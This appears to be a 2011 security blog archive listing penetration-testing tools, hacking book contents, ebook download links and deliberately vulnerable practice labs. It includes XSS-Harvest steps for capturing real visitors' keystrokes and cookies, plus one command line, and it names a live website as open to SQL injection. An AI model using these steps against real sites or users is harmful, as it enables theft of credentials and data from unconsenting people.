Friday, 8. July 2011
Web Security Dojo v.1.2
Web Security Dojo is a free open-source self-contained training environment for Web Application Security penetration testing. Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v9.10. The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started - tools, targets, and documentation.

Info:
http://www.mavensecurity.com/web_security_dojo/

Look for Dojo videos on YouTube channel at http://www.youtube.com/user/MavenSecurity

Download:
http://sourceforge.net/projects/websecuritydojo/files/Version_1.2/



Friday, 8. July 2011
The Top 500 Worst Passwords
The Top 500 Worst Passwords of All Time

Check The Link..
http://www.whatsmypass.com/the-top-500-worst-passwords-of-all-time



The Samurai Web Testing Framework Linux
The Samurai Web Testing Framework is a LiveCD

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such as WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

Download :

http://sourceforge.net/projects/samurai/



Popureb A small rootkit with a big reputation
There has been a lot of discussion in recent weeks about some new variants of the Popureb rootkit that clobber your Master Boot Record (MBR).

Initial reports from Microsoft even suggested the only way to recover was to reinstall Windows, which fortunately is not true. But knowing how this rootkit works will surely increase your knowledge.

SophosLabs published a technical paper that looks at the inner workings of Popureb.

Download
http://www.sophos.com/medialibrary/PDFs/technical%20papers/popureb.pdf?dl=true



Durandal - Distributed CPU/GPU Hash Cracker v 0.5
Durandal is a distributed GPU/CPU computing software that aims to crack passwords. Mostly written in C++ with the Boost library, it works on many systems; however, for the moment it is only built for Windows and GNU/Linux, on the x86 and x64 platforms.

Durandal is freely available under the GPLv3 license.

Features

Windows (XP, Vista, 7) and GNU/Linux support
32-bit and 64-bit support
Usual hash functions : MD5, SHA1, SHA256, SHA512, NTLMv1, MySQL (all versions)
SSE2 optimized, Nvidia CUDA support
Server, agent and administration console
Network communications with XML over HTTP (proxy support)

Download
http://durandal-project.org/download.html



Vega
Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Download
http://subgraph.com/vega_download.php

Modules

Cross Site Scripting (XSS)
SQL Injection
Directory Traversal
URL Injection
Error Detection
File Uploads
Sensitive Data Discovery



WebSurgery
WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Bruteforcer and Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injections, Cross site scripting (XSS), brute-force for login forms, identification of firewall-filtered rules etc.

Download Setup
http://www.surgeonix.com/blog/downloads/websurgery/setup.msi
Download Portable
http://www.surgeonix.com/blog/downloads/websurgery/websurgery.zip



Harvesting Cross Site Scripting (XSS) Victims - Clicks, Keystrokes and Cookies - Linux
XSS-Harvest.
It is a multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. Before going into the detail, I'll list the high level functionality below:

Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
Any key entered will be sent covertly to the server.
Any mouse click performed will be analysed and the data covertly sent to the server.
Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
If redressing the victim's browser, allow subsequently loaded pages to be also 'infected' - assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
Each victim has a separate history file containing all events, cookies and keystrokes.
Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.

How to Exploit XSS with XSS-Harvest

Identify a page vulnerable to XSS (reflected or persistent will be fine - unless the victim is running IE9 or another plugin such as NoScript).
Understand the markup of the page. You should be looking to insert syntactically correct tags in to the source of the vulnerable page. Most attackers will insert something like 'alert(1)' at this stage to ensure the page is actually vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.
Insert the following 'injection string' into the vulnerable page:

This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in - a new history file will be created for each new victim.

If you wish to make use of the redress function, start the server with the -r parameter:

./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

Download:
https://docs.google.com/leaf?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&hl=en_GB



Pangolin Free 3.2.3
Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool for Website manager or IT Security analyst. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or users specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.


Test many types of databases
Your web applications using Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, Sybase?
Pangolin supports all of them.

Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.

Download
http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip



BackTrack 4 : Assuring Security by Penetration Testing

Written as an interactive tutorial, this book covers the core of BackTrack with real-world examples and step-by-step instructions to provide professional guidelines and recommendations to you. The book is designed in a simple and intuitive manner, which allows you to explore the whole BackTrack testing process or study parts of it individually. If you are an IT security professional or network administrator who has a basic knowledge of Unix/Linux operating systems including awareness of information security factors, and you want to use BackTrack for penetration testing, then this book is for you.




Download :
http://shrta.com/files/0ZYSOJBV/BackTrack-4-Assuring-Security-by-Penetration-Testing.zip



Anonymous Super Secret Security Handbook
Anonymous Super Secret Security :P Handbook

Master Table of Contents
1) Preface
2) Setting up Tor
3) Firefox Recommended Add-Ons
4) Setting up i2p
4.1) Installation
4.2) Firefox Configuration
4.3) IRC Client Configuration
4.4) I2p IRC on Android via irssi connectbot
5) Advanced IRC
5.1) Commands
5.2) Browsing
6) Advanced Defense Techniques
7) Portable Solutions
8) ADVANCED GUIDE TO HACKING AND SECURITY VULNERABILITY

Download PDF:
http://adf.ly/313683/http://www.ziddu.com/download/15519429/Anonymous-Super-Secret-Security-Handbook.pdf.html



SQL Injection Attacks and Defense

Here is the table of contents…

Chapter 1: What is SQL Injection?
Chapter 2: Testing for SQL Injection
Chapter 3: Reviewing Code for SQL Injection
Chapter 4: Exploiting SQL Injection
Chapter 5: Blind SQL Injection Exploitation
Chapter 6: Exploiting the Operating System
Chapter 7: Advanced Topics
Chapter 8: Code-Level Defenses
Chapter 9: Platform-Level Defenses
Chapter 10: References



The Shellcoder’s Handbook

Part 1: Introduction to Exploitation: Linux on x86.

Chapter 1: Before You Begin.
Chapter 2: Stack Overflows.
Chapter 3: Shellcode.
Chapter 4: Introduction to Format String Bugs.
Chapter 5: Introduction to Heap Overflows.

Part 2: Exploiting More Platforms: Windows, Solaris, and Tru64.

Chapter 6: The Wild World of Windows.
Chapter 7: Windows Shellcode.
Chapter 8: Windows Overflows.
Chapter 9: Overcoming Filters.
Chapter 10: Introduction to Solaris Exploitation.
Chapter 11: Advanced Solaris Exploitation.
Chapter 12: HP Tru64 Unix Exploitation.

Part 3: Vulnerability Discovery.

Chapter 13: Establishing a Working Environment.
Chapter 14: Fault Injection.
Chapter 15: The Art of Fuzzing.
Chapter 16: Source Code Auditing: Finding Vulnerabilities in C-Based Languages.
Chapter 17: Instrumented Investigation: A Manual Approach.
Chapter 18: Tracing for Vulnerabilities.
Chapter 19: Binary Auditing: Hacking Closed Source Software.

Part 4: Advanced Materials.

Chapter 20: Alternative Payload Strategies.
Chapter 21: Writing Exploits that Work in the Wild.
Chapter 22: Attacking Database Software.
Chapter 23: Kernel Overflows.
Chapter 24: Exploiting Kernel Vulnerabilities.



Malware Analyst’s Cookbook and DVD
Title: Malware Analyst’s Cookbook and DVD
Author: Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard
Publisher: Wiley
Hardcover: 744 pages
Release Date: November 2, 2010

Here is the ‘Table of Contents’

Chapter 1 – Anonymizing Your Activities.
Chapter 2 – Honeypots.
Chapter 3 – Malware Classification.
Chapter 4 – Sandboxes and Multi-AV Scanners.
Chapter 5 – Researching Domains and IP Addresses.
Chapter 6 – Documents, Shellcode, and URLs.
Chapter 7 – Malware Labs.
Chapter 8 – Automation.
Chapter 9 – Dynamic Analysis.
Chapter 10 – Malware Forensics.
Chapter 11 – Debugging Malware.
Chapter 12 – De-Obfuscation.
Chapter 13 – Working with DLLs.
Chapter 14 – Kernel Debugging.
Chapter 15 – Memory Forensics with Volatility.
Chapter 16 – Memory Forensics: Code Injection and Extraction.
Chapter 17 – Memory Forensics: Rootkits.
Chapter 18 – Memory Forensics: Network and Registry.



Social Engineering: The Art of Human Hacking

Title: Social Engineering: The Art of Human Hacking
Author: Christopher Hadnagy, Paul Wilson
Publisher: Wiley
Hardcover: 408 pages
Release Date: December 21, 2010

Table of Contents

A Look into the World of Social Engineering.
Information Gathering.
Elicitation.
Pretexting: How to Become Anyone.
Mind Tricks: Psychological Principles Used in Social Engineering.
Influence: The Power of Persuasion.
The Tools of the Social Engineer.
Case Studies: Dissecting the Social Engineer.
Prevention and Mitigation.



Android in Action
Title: Android in Action
Author: Frank Ableson, Robi Sen
Publisher: Manning Publications
Hardcover: 592 pages
Release Date: Jan 28, 2011 (2nd Edition)

Here’s the table of Contents

Part 1 What is Android?—The Big Picture

Chapter 1 Introducing Android
Chapter 2 Android’s development environment
Part 2 Exercising the Android SDK

Chapter 3 User interfaces
Chapter 4 Intents and Services
Chapter 5 Storing and retrieving data
Chapter 6 Networking and web services
Chapter 7 Telephony
Chapter 8 Notifications and alarms
Chapter 9 Graphics and animation
Chapter 10 Multimedia
Chapter 11 Location, location, location
Part 3 Android applications

Chapter 12 Putting Android to work in a field service application
Chapter 13 Building Android applications in C
Part 4 The maturing platform

Chapter 14 Bluetooth and sensors
Chapter 15 Integration
Chapter 16 Android web development
Chapter 17 AppWidgets
Chapter 18 Localization
Chapter 19 Android Native Development Kit



Practical Lock Picking

Title: Practical Lock Picking: A Physical Penetration Tester’s Training Guide
Author: Deviant Ollam
Publisher: Syngress
Hardcover: 236 pages
Release Date: July 23, 2010

Here is the table of contents

Chapter 1: Fundamentals of pin tumbler and wafer locks
Chapter 2: The basics of picking: Exploiting weaknesses
Chapter 3: Beginner training: How to get very good, very fast
Chapter 4: Advanced training: Learning some additional skills
Chapter 5: Quick-entry tricks: Shimming, bumping, and bypassing
Chapter 6: They all come tumbling down: Pin tumblers in other configurations
Appendix: Guide to tools and toolkits



The Hacker News June 2011

Content :
- Total Exposure
- Wikileaks : Exposure in true way
- Guide about selecting your Computer Security Consultant
- In the Realm of Cyber Breach
- Exploit Writers : Challenging Cyber Security
- Interview with Team Inj3ct0r
- IT Security Incident Management
- Interview with Core Anonymous Member : Anony_ops
- Exposure of Password secrets of Apple Safari
- Sony Hacked , Again hacked & Again Hacked
- Hacking News Highlights of the Month
- Hackers Toolkits Updates
- Security Tool : Buffer Zone

Download:
http://theevilhackerz.com/THN-june2011.pdf





ClubHACK Magazine Issue 17-June 2011

Tech Gyan - Pentesting your own Wireless Network
Tool Gyan - Wi-Fi tools
Mom's Guide - Wireless Security - Best Practices
Legal Gyan - Copyrights and cyber space
Matriux Vibhag - Forensics with Matriux Part - 2
Poster of the month - Can you cage a Wi-Fi signal?

Download:
http://chmag.in/issue/jun2011.pdf



ClubHack Magazine

Contents of this Issue:-

Tech Gyan - First ever public disclosure of Password secrets of "Apple Safari".
Tool Gyan - BeEF (Browser Exploitation Framework)
Mom's Guide - User Agent on my Header.
Legal Gyan - New Rules under Information Technology Act.
Matriux Vibhag - Forensics with Matriux Part - 1
Poster of the month - How safe you are while surfing?


Direct Download: http://chmag.in/issue/may2011.pdf



The Web Application Hacker's Handbook 2nd: Discovering and Exploiting Security Flaws

Web Application (In)security
Core Defense Mechanisms
Web Application Technologies
Mapping the Application
Bypassing Client-Side Controls
Attacking Authentication
Attacking Session Management
Attacking Access Controls
Injecting Code
Exploiting Path Traversal
Attacking Application Logic
Attacking Other Users
Automating Bespoke Attacks
Exploiting Information Disclosure
Attacking Compiled Applications
Attacking Application Architecture
Attacking the Web Server
Finding Vulnerabilities in Source Code
A Web Application Hacker's Toolkit
A Web Application Hacker's Methodology

Download the full table of contents (PDF).
http://portswigger.net/wahh/wahh-toc.pdf



ClubHack Magazine: this issue is dedicated to browser security.

Direct Download:
http://chmag.in/issue/may2011.pdf

Tech Gyan - First ever public disclosure of Password secrets of "Apple Safari".
Tool Gyan - BeEF (Browser Exploitation Framework)
Mom's Guide - User Agent on my Header.
Legal Gyan - New Rules under Information Technology Act.
Matriux Vibhag - Forensics with Matriux Part - 1



The Hacker News' Magazine - Social Engineering Edition
The Hacker News' Magazine - Social Engineering Edition - Issue 02 - May 2011 Released!

We are happy to announce that 'The Hacker News' [THN] Magazine Issue 02 (May 2011) is out. This time we cover the "Social Engineering Edition". The index of contents is given below:

Social Engineering
Opsony By Anonymous
Anna Hazare - The Revolution in India
Message By Pattie Galle
Hacking News of Month
Hackers Toolkit updates & Downloads
Defacement News
Security and Hacking Events of Month
Cyber Crime News
Linux News
Security Updates
Vulnerability Exposure

Download:
http://theevilhackerz.com/may-2011.pdf



The Hacker’s Underground Handbook
Ebook

The Hacker’s Underground Handbook
Learn What it Takes to Crack Even the Most Secure Systems
By: David Melnichuk

The Hacker’s Underground Handbook will guide you through password hacking, Windows hacking, malware, phishing, web hacking, network hacking and Linux (intro, installation, etc). All this material is fully packed with images, thus being a top step-by-step guide, on the course of which you cannot fail.

A great starting book which will guide you in the right direction, helping you understand the basic concepts of computer security and matters that you should take in consideration.

Download PDF
http://3xploit.com/file/The_Hackers_Underground_Handbook.pdf



XSS Attacks
Ebook

PUBLISHED BY- Syngress Publishing, Inc. ISBN-10: 1-59749-154-3
ISBN-13: 978-1-59749-154-9
This book is all about XSS. It will cover these topics on XSS.

Cross-site Scripting Fundamentals.
The XSS Discovery Toolkit
XSS Theory
XSS Attack Methods
Advanced XSS Attack Vectors
XSS Exploited
Exploit Frameworks
XSS Worms
Preventing XSS Attacks

Download PDF
http://3xploit.com/file/Cross_Site_Scripting_Attacks_XSS_Exploits_and_Defense_tqw_darksiderg.rar



The Art of Computer Virus Research and Defense
Title: The Art of Computer Virus Research and Defense
Author: Peter Szor
Publisher: Addison-Wesley Professional
Hardcover: 744 pages



Part: I Strategies of the Attacker

Chapter 1. Introduction to the Games of Nature
Chapter 2. The Fascination of Malicious Code Analysis
Chapter 3. Malicious Code Environments
Chapter 4. Classification of Infection Strategies
Chapter 5. Classification of In-Memory Strategies
Chapter 6. Basic Self-Protection Strategies
Chapter 7. Advanced Code Evolution Techniques and Computer Virus Generator Kits
Chapter 8. Classification According to Payload
Chapter 9. Strategies of Computer Worms
Chapter 10. Exploits, Vulnerabilities, and Buffer Overflow Attacks

Part: II Strategies of the Defender

Chapter 11. Antivirus Defense Techniques
Chapter 12. Memory Scanning and Disinfection
Chapter 13. Worm-Blocking Techniques and Host-Based Intrusion Prevention
Chapter 14. Network-Level Defense Strategies
Chapter 15. Malicious Code Analysis Techniques



Kingpin – How One Hacker Took Over the Billion-Dollar Cybercrime Underground
Title: Kingpin – How One Hacker Took Over the Billion-Dollar Cybercrime Underground
Author: Kevin Poulsen
Publisher: Crown
Hardcover: 288 pages
Release Date: February 22, 2011

In KINGPIN, Kevin tells the story of Max Vision, a white hat computer hacker who turned to the dark side. Among other things, Max stole credit card data — “dumps” — on millions of consumers, which he sold in bulk to a card counterfeiter named Chris Aragon. In this excerpt, a new discovery gives him a chance to expand his operation.
The book exposes the scary story of how online hackers stocked credit card numbers, fake checks and hacked bank accounts to make millions overnight through a well-structured ring of criminals operating from dark corners of the world. It showcases how attackers used advanced techniques such as remote execution exploits, smart phishing sites, Trojans and advanced keyloggers to sweep up innocent victims around the world and transferred bounties under the nose of security guards from top banks. A good case study for Howard folks to ponder into.



Should I Change My Password?
This site uses a number of databases that have been released to the public. No passwords are stored in the ShouldIChangeMyPassword.com database.

https://shouldichangemypassword.com/

Source
https://shouldichangemypassword.com/sources.php



Wednesday, 6. July 2011
Pentest - (Offline) Web Based
Name: BadStore
Homepage: http://www.badstore.net/
Brief description: Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure. Our Badstore demonstration software is designed to show you common hacking techniques.
Version/Levels: 1 (v1.2)


Name: BodgeIT
Homepage: https://code.google.com/p/bodgeit/
Brief description: The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
Version/Levels: 1 (v1.1.0)


Name: Damn Vulnerable Web App
Homepage: http://www.dvwa.co.uk/
Brief description: Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
Version/Levels: 1 (v1.0.7)



Name: Hacking-Lab
Homepage: http://www.hacking-lab.com/
Brief description: This is the LiveCD project of Hacking-Lab (www.hacking-lab.com). It gives you OpenVPN access into Hacking-Lab's Remote Security Lab. The LiveCD iso image runs very well natively on a host OS, or within a virtual environment (VMware, VirtualBox).
The LiveCD gives you OpenVPN access into Hacking-Lab Remote. You will gain VPN access if both of the two pre-requirements are fulfilled.
Version/Levels: 1 (v5.30)


Name: HackUS HackFest Web CTF
Homepage: http://hackus.org/en/media/training/
Brief description: The Hackfest is an annual event held in Quebec city. For each event, a competition is held where participants competed at solving challenges related to security. For the 2010 edition, I got involved in the competition by creating the web portion of the competition.
Version/Levels: 1 (2010)



Name: Hacme
Homepage: http://www.mcafee.com/us/downloads/free-tools/index.aspx
Brief description: Foundstone Hacme Casino™ is a learning platform for secure software development and is targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.
Version/Levels: 5 (2006)



Name: Hackxor
Homepage: http://hackxor.sourceforge.net/cgi-bin/index.pl
Brief description: Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc
Version/Levels: 1



Name: LAMPSecurity
Homepage: http://sourceforge.net/projects/lampsecurity/
Brief description: Foundstone Hacme Casino™ is a learning platform for secure software development and is targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.
Version/Levels: v6 (4x)



Name: Moth
Homepage: http://www.bonsai-sec.com/en/research/moth.php
Brief description: Moth is a VMware image with a set of vulnerable Web Applications and scripts.
Version/Levels: v6



Name: Mutillidae
Homepage: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Brief description: Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10
Version/Levels: v1.5



Name: Open Web Application Security Project (OWASP) Broken Web Applications Project
Homepage: https://code.google.com/p/owaspbwa/ or https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
Brief description: This project includes applications from various sources (listed in no particular order).



Name: SecuriBench
Homepage: http://suif.stanford.edu/~livshits/securibench/
Brief description: Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java
Version/Levels: v0.91a



Name: UltimateLAMP
Homepage: http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/
Brief description: UltimateLAMP is a fully functional environment allowing you to easily try and evaluate a number of LAMP stack software products without requiring any specific setup or configuration of these products. UltimateLAMP runs as a Virtual Machine with VMware Player (FREE). This demonstration package also enables the recording of all user entered information for later reference, indeed you will find a wealth of information already available within a number of the Product Recommendations starting with the supplied Documentation.
Version/Levels: v0.2



Name: Vicnum
Homepage: http://vicnum.ciphertechs.com/
Brief description: A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats
Version/Levels: 1.4 (2009)


Name: Virtual Hacking Lab
Homepage: http://virtualhacking.sourceforge.net/
Brief description: A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats
Version/Levels: 1



Name: WackoPicko
Homepage: https://github.com/adamdoupe/WackoPicko
Brief description: WackoPicko is a vulnerable web application used to test web application vulnerability scanners.
Version/Levels: 1


Name: WebGoat
Homepage: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
Brief description: WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application.
Version/Levels: 1



Name: WebMaven
Homepage: http://www.mavensecurity.com/WebMaven/
Brief description: WebMaven (better known as Buggy Bank) was an interactive learning environment for web application security. It emulated various security flaws for the user to find. This enabled users to safely & legally practice web application vulnerability assessment techniques. In addition, users could benchmark their security audit tools to ensure they perform as advertised.
Version/Levels: 1.0.1


Name: Web Security Dojo
Homepage: http://www.mavensecurity.com/web_security_dojo/
Brief description: A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.1, which is patched with the appropriate updates and VM additions for easy use.
Version 1.1 includes an exclusive speed-enhanced version of Burp Suite Free. Special thanks to PortSwigger.
Version/Levels: 1



Pentest - Forensic
Name: Digital Forensics Tool Testing Images
Homepage: http://dftt.sourceforge.net/
Brief description: To fill the gap between extensive tests from NIST and no public tests, I have been developing small test cases. The following are file system and disk images for testing digital (computer) forensic analysis and acquisition tools.
Version/Levels: 14


Name: Digital Corpora - DiskImages & Scenarios
Homepage: http://digitalcorpora.org/corpora/disk-images & http://digitalcorpora.org/corpora/scenarios
Brief description: We have many sources of disk images available for use in education and research. The easiest disk images to work with are the NPS Test Disk Images.


Scenarios are collections of multiple disk images, memory dumps, network traffic, and/or data from portable devices.
Version/Levels: 3 + 7


Name: DFRWS 2011 Forensics Challenge
Homepage: http://www.dfrws.org/2011/challenge/
Brief description: Given the variety and impending ubiquity of Android devices along with the wide range of crimes that can involve these systems as a source of evidence, the DFRWS has created two scenarios for the forensics challenge in 2011.
Version/Levels: 2


Name: ForensicKB
Homepage: http://www.forensickb.com/search/label/Forensic%20Practical
Brief description: We have many sources of disk images available for use in education and research. The easiest disk images to work with are the NPS Test Disk Images.
Version/Levels: Level 1, Level 2, Level 3, Level 4



Name: Honeynet Project Challenges
Homepage: https://www.honeynet.org/challenges
Brief description: The purpose of Honeynet Challenges is to take this learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Challenges give the security community the opportunity to analyze these attacks and share their findings. The end result is that individuals and organizations not only learn about threats, but also how to learn and analyze them. Even better, individuals can see the write-ups from other individuals, learning new tools and techniques for analyzing attacks. Best of all, these attacks are from the wild, real hacks.
Version/Levels: 8



Pentest - Online (VPN - War Games)
Name: OverTheWire
Homepage: http://www.overthewire.org/wargames/
Brief description: The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games.
Levels: 7



Name: pwn0
Homepage: https://pwn0.com/home.php
Brief description: Just sign up, connect to the VPN, and start hacking.
Levels: 1



Pentest - (Online) Web Based
Name: Biscuit
Homepage: http://heideri.ch/biscuit/
Brief description: Goal: alert(document.cookie) // extract the PHPSESSID, FF3.6 - 4 only!
Version/Levels: 1


Name: Gruyere / Jarlsberg
Homepage: http://google-gruyere.appspot.com/
Brief description: This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application.
Version/Levels: 1 (v1.0.7)



Name: HackThis
Homepage: http://www.hackthis.co.uk/
Brief description: Welcome to HackThis!!, this site was set up over 2 years ago as a safe place for internet users to learn the art of hacking in a controlled environment, teaching the most common flaws in internet security.
Version/Levels: 32 (40?)



Name: HackThisSite
Homepage: http://www.hackthissite.org/
Brief description: Hack This Site is a free, safe and legal training ground for hackers to test and expand their hacking skills. More than just another hacker wargames site, we are a living, breathing community with many active projects in development, with a vast selection of hacking articles and a huge forum where users can discuss hacking, network security, and just about everything. Tune in to the hacker underground and get involved with the project.
Version/Levels: Lots


Name: Hell Bound Hackers
Homepage: http://www.hellboundhackers.org/
Brief description: We offer challenges that teach you how computer based exploits work. The idea being, if you know how to exploit a website for instance, then you can go and secure your website, and help others in securing theirs. If you know how malicious hackers get in, you can keep them out.
Version/Levels: Lots


Name: Hackxor
Homepage: http://hackxor.sourceforge.net/cgi-bin/index.pl
Brief description: Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism & difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc.
Version/Levels: 1


Name: Vicnum
Homepage: http://vicnum.ciphertechs.com/
Brief description: A mirror of deliberately insecure applications and old software with known vulnerabilities. Used for proof-of-concept, security training and learning purposes. Available in either virtual images or live ISO or standalone formats.
Version/Levels: 1.4 (2009)



Pentest - Complete Operating System
Name: Damn Vulnerable Linux
Homepage: http://www.damnvulnerablelinux.org/
Brief description: Damn Vulnerable Linux (DVL) is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
Version/Levels: 1


Name: De-ICE
Homepage: http://heorot.net/livecds/ or http://www.de-ice.net
Brief description: The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.
Version/Levels: Level 1 - Disk 1, Level 1 - Disk 2, Level 1 - Disk 3 (A & B), Level 2 - Disk 1



Name: Holynix
Homepage: http://pynstrom.net/holynix.php
Brief description: Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing.
Version/Levels: 2


Name: Kioptrix
Homepage: http://www.kioptrix.com
Brief description: These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
Version/Levels: 3


Name: Metasploitable
Homepage: http://blog.metasploit.com/2010/05/introducing-metasploitable.html
Brief description: One of the questions that we often hear is "What systems can I use to test against?" Based on this, we thought it would be a good idea to throw together an exploitable VM that you can use for testing purposes.
Version/Levels: 1



Name: NETinVM
Homepage: http://informatica.uv.es/~carlos/docencia/netinvm/#id7
Brief description: NETinVM is a single VMware virtual machine image that contains, ready to run, a series of User-mode Linux (UML) virtual machines which, when started, conform a whole computer network inside the VMware virtual machine. Hence the name NETinVM, an acronym for NETwork in Virtual Machine. NETinVM has been conceived mainly as an educational tool for teaching and learning about operating systems, computer networks and system and network security, but other uses are certainly possible.
Version/Levels: 3 (2010-12-01)



Name: pWnOS
Homepage: http://forums.heorot.net/viewtopic.php?f=21&t=149
Brief description: It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :) Currently, the virtual machine NIC is configured in bridged networking, so it will obtain a normal IP address on the network you are connected to. You can easily change this to NAT or Host Only if you desire. A quick ping sweep will show the IP address of the virtual machine.
Version/Levels: 1



Name: RuCTFE 2010
Homepage: http://ructf.org/e/2010/
Brief description: RuCTFE is a remote challenge in information security
Version/Levels: 1



Dukascopy.com - SQL Injection
General Information

Website: www.dukascopy.com
Vulnerability Type: SQL Injection Vulnerability
Alert Level: Critical
Threats: Entire Database Access, Shell Uploading

by Mr.
zsecure



Wifi Cracker 1.5 - Linux
Fern Wifi Cracker 1.5 is available: download Fern 1.2, then update to 1.5 by using the update download button.

This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.

It should work on any version of linux running the following:

Requirements:

python
python-qt4
macchanger
aircrack-ng
xterm
subversion

To install, simply run the following command in a terminal after changing directory to the path where the downloaded package is:

root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb

Download
http://code.google.com/p/fern-wifi-cracker/downloads/list



OWASP Zed Attack Proxy v.1.3.1
OWASP Zed Attack Proxy v.1.3.1 Released
The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen tester's toolbox.

Download:
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Changelog:
https://code.google.com/p/zaproxy/downloads/list



50 Days of Lulz - LulzSec Says Goodbye
http://www.youtube.com/watch?v=xJYhPrbtqug&feature=player_embedded

ironic
http://www.youtube.com/watch?v=quSL92cIueI



Sniffjoke 0.4.2 - Linux
